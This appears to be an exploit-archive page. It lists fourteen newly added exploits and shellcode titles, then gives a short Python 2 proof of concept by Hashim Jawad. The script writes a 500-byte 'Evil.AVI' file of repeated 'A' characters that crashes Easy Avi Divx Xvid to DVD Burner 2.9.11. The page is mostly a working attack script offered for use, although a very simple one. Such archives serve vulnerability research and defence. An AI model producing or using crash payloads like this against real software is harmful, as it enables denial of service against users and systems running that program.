
14 changes to exploits/shellcodes Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Dell EMC NetWorker - Denial of Service WM Recorder 16.8.1 - Denial of Service Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer Overflow Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve ) Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH) Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery XenForo 2 - CSS Loader Denial of Service MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion Linux/x86 - EggHunter Shellcode (11 Bytes)
23 lines
No EOL
1.2 KiB
Python
Executable file
23 lines
No EOL
1.2 KiB
Python
Executable file
#!/usr/bin/python
|
|
###########################################################################################
|
|
# Exploit Title : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
|
|
# Exploit Author : Hashim Jawad #
|
|
# Twitter : @ihack4falafel #
|
|
# Author Website : ihack4falafel[.]com #
|
|
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
|
|
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe #
|
|
# Tested on OS : Windows XP professional SP3 #
|
|
# Windows 10 professional 64-bit #
|
|
# Steps to reproduce : Add Evil.AVI and BOOM! #
|
|
###########################################################################################
|
|
|
|
buffer = "A" * 500
|
|
|
|
try:
|
|
f=open("Evil.AVI","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
|
f.write(buffer)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |